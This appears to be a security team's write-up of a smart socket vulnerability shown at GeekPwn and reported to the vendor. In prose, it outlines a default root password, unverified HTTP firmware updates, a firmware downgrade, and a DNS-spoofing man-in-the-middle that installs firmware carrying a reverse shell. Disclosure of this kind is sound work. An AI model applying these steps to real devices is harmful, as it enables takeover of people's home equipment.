In recent years, smart home is becoming more and more popular, and a variety of products emerge, such as smart TV, smart socket, smart light bulb, smart door lock, smart camera. Smart home provides convenience for our life and infinite imagination space for the future. However, the performance of most smart home products in terms of security is worrying, so to speak, it's like an invisible bomb on an airplane may be detonated at any time.
For the security of intelligent devices, many security researchers have begun to pay attention to it, such as the recent research of mythical ghost axe laboratory in the field of automobile anti-theft system. Of course, we are also paying attention to and researching. For some results, please refer to the article "hidden crisis - smart device security" of the joint research team of Internet of things security.
The author participated in this year's geekpwn (a great competition focusing on the safety of intelligent life) with the team some time ago, analyzed a certain intelligent socket and found some problems, but in the process of the competition, some accidents resulted in the failure of the demonstration. However, it doesn't matter. This paper explores the security of intelligent life through the problem of this intelligent socket. The vulnerability involved in this article has been officially notified by geekpwn to the manufacturer for repair.
[discovery]
The control diagram of the socket is as follows:
Process:
1) The mobile app completes the configuration through the WiFi provided by the smart socket, and informs the smart socket router password;
2) The intelligent socket connects the server through the router;
3) The mobile app and the smart socket are connected to the server at the same time, and the XMPP protocol is used for communication to complete the control, upgrade and other operations of the smart socket by the mobile app
In addition, the socket firmware upgrade process: the mobile phone sends the upgrade request to the server, the server sends the upgraded firmware address to the smart socket, and the smart socket downloads the firmware by itself and completes the upgrade.
In the process of firmware upgrade, we can find that the smart socket will download and update firmware y2.bin and verification code y2.bin.md5 from a fixed URL through HTTP. Obviously, there is a possibility of man in the middle attack.
[further analysis]
Binwalk decompresses and upgrades firmware y2.bin. It can be seen that the socket uses openwrt system.
Check the shadow file and find the default password of the root user p9zxxx.
Nmap scan, the socket opened the TCP 22 (SSH) port.
So I decided to try. SSH directly logged in. You can update the firmware directly by using the system's own sysupgrade. This process does not verify whether the firmware to be brushed is higher than the current firmware version, and there is a vulnerability of firmware degradation.
Embed the rebound shell code in the extracted firmware and package the firmware. Openwrt's own NC does not have the - e option. You can use a trick to bind the specified port, as shown in the following figure. Refer to this article for the repackaging method of openwrt squashfs ROM. The author has successfully damaged two sockets.
[an actual penetration test]
Try to build an environment for man in the middle attack. Because it is not convenient to modify HTTP packets on the router, the attack mode of DNS spoofing in LAN is adopted. The network environment is as shown in the figure.
Attackers located in the same LAN use the DNS? Spoof module of ettercap to attack.
At this time, the user uses the mobile app to send the firmware upgrade command to the socket. As you can see, DNS spoofing has been successfully implemented twice. One is y2.bin, the other is y2.bin.md5.
After updating the firmware, restart the socket. The public network host successfully obtains the rebound shell, as shown in the following figure.
Due to the limited conditions, only the attack scenario of DNS spoofing is demonstrated. Other possible man in the middle attacks include modifying the URL of the request packet in the router or backbone, and modifying the data returned by the HTTP request using ARP attacks. It can be seen that it is unwise for smart sockets to use HTTP transmission without implementing effective file verification (for example, using asymmetric encryption algorithm).
[Conclusion]
There are many security risks in intelligent hardware, including not only user privacy, but also personal security. As in the plot of cybercrime investigation, the criminal remotely controls the baby camera, discovers the parents' routine and steals the baby while the parents are sleeping.
In addition, five students from Tencent's Internet of things security research team participated in geekpwn and demonstrated the project (remember that drone hijacking). Technology sharing will come together in TSRC blog in the future, please pay attention.
Finally, we hope that smart hardware manufacturers can pay more attention to security and provide a secure smart life. We will also do our part to the industry to build a more secure Internet of things.